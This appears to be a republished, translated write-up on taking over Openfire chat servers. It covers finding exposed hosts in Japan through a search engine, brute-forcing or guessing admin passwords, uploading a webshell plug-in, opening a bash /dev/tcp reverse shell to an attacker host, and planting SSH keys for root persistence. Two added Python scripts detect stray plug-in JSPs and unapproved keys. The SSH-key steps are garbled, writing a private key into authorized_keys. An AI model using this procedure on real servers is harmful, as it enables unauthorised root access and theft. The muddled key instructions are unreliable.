OpenFire backend plug-in uploads to get webshell and login to linux server without password

2025-01-19 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

This test comes from a university assignment. During the engagement it was found that Openfire was installed in the target's IP range and that port 8080 on the server was reachable. Openfire is an open source real-time collaboration server based on the Extensible Messaging and Presence Protocol (XMPP) and written in Java. It is very simple to install and use, is managed through a web console, and a single server can support tens of thousands of concurrent users, so it is commonly used in large enterprises. Openfire is similar to JBoss in that a webshell can be obtained by uploading a plug-in, except that an Openfire plug-in requires modifying the code and recompiling it. After research and testing, as long as you have a login account you can obtain a webshell by uploading a plug-in. The privileges obtained are generally high, usually root; foreign servers generally run Openfire under a dedicated account of its own. The whole process follows.

1. Target acquisition

(1) On fofa.so, search body="Openfire, version:" && country=JP to list Openfire servers located in Japan, as shown in figure 1.

Figure 1. Search target

2. Brute force or weak-password login to the system

Common weak passwords are admin/admin, admin/admin888 and admin/123456. If none of these work, use Burp Suite directly against the login page that is reachable, as shown in figure 2; note that Openfire may listen on different ports.

Figure 2. Openfire backend login address

3. Enter the backend

After entering the correct password you reach the backend, as shown in figure 3, where server settings, users and user groups, sessions, group chats, plug-ins and other information can be viewed.

Figure 3. Entering the backend

4. View and upload plug-ins

Click Plug-ins to see a list of all installed plug-ins. Under Upload Plugin, click Upload Plugin and select the specially built Openfire plug-in containing the webshell, as shown in figure 4.

Figure 4. Uploading a plug-in

In this test, plug-ins collected from the Internet were also tried, as shown in figure 5, and all of them uploaded successfully.

Figure 5. Uploading the plug-in with the webshell

5. Get webshell

(1) Obtaining a webshell through the helloworld plug-in

Click Server - Server Settings, as shown in figure 6. If the helloworld plug-in was uploaded and runs successfully, a user interface setting is generated under the profile settings. Click the link to get the webshell, as shown in figure 7.

Figure 6. Viewing server settings

Figure 7. Getting the webshell

(2) Obtaining a webshell through the broadcast plug-in

Use the URL in the form url + plugins/broadcast/ + webshell file name:

http://xxx.xxx.xxx.xxx:8080/plugins/broadcast/cmd.jsp?cmd=whoami

http://xxx.xxx.xxx.xxx:8080/plugins/broadcast/browser.jsp

The webshell in the helloworld plug-in can likewise be reached at:

http://xxx.xxx.xxx.xxx:8080/plugins/helloworld/chakan.jsp

As shown in figures 8 and 9, the broadcast webshell is obtained and the current user is seen to be root.

Figure 8. Getting the current user's privileges

Figure 9. Getting the webshell
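On the defensive side, the plug-in upload path described above leaves new JSP files under the Openfire plugins directory that a clean install never had. The following added example (not from the original post) baselines the hashes of web artefacts under plugins/ and reports anything added or changed afterwards; the directory layout and file names it uses are constructed.

```python
"""Detect web artefacts added to an Openfire plugins/ tree after a known-clean baseline.
Added example, not code from the original post. Paths and file contents below are
constructed in a temp dir; build the real baseline from a freshly installed server."""
import hashlib
import os
import tempfile

# Executable web content that a malicious plug-in upload can drop under plugins/<name>/
WEB_SUFFIXES = (".jsp", ".jspx", ".class", ".jar")


def sha256_file(path):
    # Stream the file so large plug-in JARs do not need to fit in memory.
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(plugins_dir):
    """Map relative path -> sha256 for every web artefact under plugins_dir."""
    result = {}
    for root, _dirs, files in os.walk(plugins_dir):
        for name in files:
            if name.lower().endswith(WEB_SUFFIXES):
                full = os.path.join(root, name)
                result[os.path.relpath(full, plugins_dir)] = sha256_file(full)
    return result


def audit(plugins_dir, baseline):
    """Return (new_files, modified_files) compared with the baseline snapshot."""
    current = snapshot(plugins_dir)
    new = sorted(p for p in current if p not in baseline)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return new, modified


def demo():
    """Constructed scenario: baseline a clean plug-in, then a JSP appears that was not there."""
    with tempfile.TemporaryDirectory() as plugins:
        os.makedirs(os.path.join(plugins, "broadcast"))
        with open(os.path.join(plugins, "broadcast", "broadcast-admin.jsp"), "w") as f:
            f.write("<%-- legitimate plug-in page (constructed) --%>")
        baseline = snapshot(plugins)
        with open(os.path.join(plugins, "broadcast", "cmd.jsp"), "w") as f:
            f.write("<%-- unexpected page dropped after the baseline (constructed) --%>")
        return audit(plugins, baseline)
```

Run snapshot() once against a trusted install, store the result, and schedule audit() against it; any JSP that appears outside a planned plug-in update deserves an incident review.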

6. Logging in to the server without the root password

By the old way of thinking the test should end here, but I wanted to try another approach. Although the /etc/shadow file can be read through the webshell, the passwords of root and the other users are obviously not easy to crack. If the server runs SSH, can public and private keys solve the access problem instead?

(1) Listening on the controlled host

Execute a command on the server that connects back to port 8080 of the controlled host xxx.xxx.xxx.xxx. nc must already be listening on port 8080 there, i.e. run "nc -vv -l -p 8080" in advance, as shown in figure 10.

Figure 10. Listening on port 8080

(2) Reverse shell to the controlled host

Execute the command "bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/8080 0>&1" to connect back to the controlled host and obtain a reverse shell, as shown in figure 11.

Figure 11. Reverse shell

7. Actual operation flow

(1) Generate public and private keys on the remote server

Execute "ssh-keygen -t rsa" on the target server and press Enter three times to accept the defaults. As shown in figure 12, id_rsa and id_rsa.pub are generated in the /root/.ssh/ directory; id_rsa is the server's private key and is especially important, and id_rsa.pub is the public key.

Figure 12. Generating public and private keys on the remote server

(2) Generate public and private keys on the local Linux machine

Execute "ssh-keygen -t rsa" on the local Linux machine to generate a key pair, download the remote server's id_rsa to the local machine, and execute "cat id_rsa > /root/.ssh/authorized_keys" to write the remote server's private key into the authorized_keys file.

(3) Upload the local public key to the remote server and generate authorized_keys

cat id_rsa.pub > /root/.ssh/authorized_keys

(4) Delete the redundant files

rm id_rsa.pub

rm id_rsa

(5) Log in to the server

Use "ssh root@1xx.1xx.111.1xx" to log in to the server. No password for the remote server is requested, so the goal of logging in to the server seamlessly is achieved.
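The persistence step above works by writing a public key into root's authorized_keys, which is why that file should be audited against a list of approved keys. The following added example (not from the original post) parses an authorized_keys file, computes OpenSSH-style SHA256 fingerprints, and flags unknown, malformed or unrestricted entries; the key blobs, comments and the allowlist are constructed.

```python
"""Audit root's authorized_keys against an allowlist of approved SSH key fingerprints.
Added example, not code from the original post; the key blobs and allowlist below are
constructed. Populate the real allowlist with the output of `ssh-keygen -lf` on approved keys."""
import base64
import binascii
import hashlib

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def fingerprint(b64_blob):
    """OpenSSH-style fingerprint: 'SHA256:' + unpadded base64 of the SHA-256 of the key blob."""
    digest = hashlib.sha256(base64.b64decode(b64_blob, validate=True)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_line(line):
    """Return (options, key_type, blob, comment), or None for blank and comment lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    tokens = line.split()
    # Options such as from=... or command=... precede the key type, so find the type token first.
    idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
    if idx is None or idx + 1 >= len(tokens):
        raise ValueError("no recognised key type followed by a key blob")
    return " ".join(tokens[:idx]), tokens[idx], tokens[idx + 1], " ".join(tokens[idx + 2:])


def audit(text, approved):
    """Return (line_no, reason) for every key that is unknown, malformed or not source-restricted."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        try:
            entry = parse_line(raw)
            if entry is None:
                continue
            options, _key_type, blob, comment = entry
            fp = fingerprint(blob)
        except (ValueError, binascii.Error):
            findings.append((n, "malformed entry"))
            continue
        if fp not in approved:
            findings.append((n, f"unknown key {fp} ({comment or 'no comment'})"))
        elif "from=" not in options:
            findings.append((n, f"approved key {fp} has no from= source restriction"))
    return findings


def demo():
    """Constructed file: one approved, source-restricted key and one key nobody approved."""
    good = base64.b64encode(b"constructed-approved-key").decode()
    rogue = base64.b64encode(b"constructed-unknown-key").decode()
    text = ("# constructed sample authorized_keys\n"
            f'from="10.0.0.0/8" ssh-ed25519 {good} admin@workstation\n'
            f"ssh-rsa {rogue} root@unknown-host\n")
    return audit(text, {fingerprint(good)})
```

Comparing the reported fingerprints with `ssh-keygen -lf` output on the approved public keys keeps the allowlist independent of the file being audited.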

8. Summary

(1) Exploiting Openfire this way requires the administrator's account and password; it currently works against all versions. The latest version of Openfire is 4.1.5.

(2) The admin administrator account can be brute-forced with Burp Suite.

(3) For Openfire security hardening, use a strong password and strictly restrict plug-in permissions. It is recommended to block newly created directories other than the necessary plug-in directories.
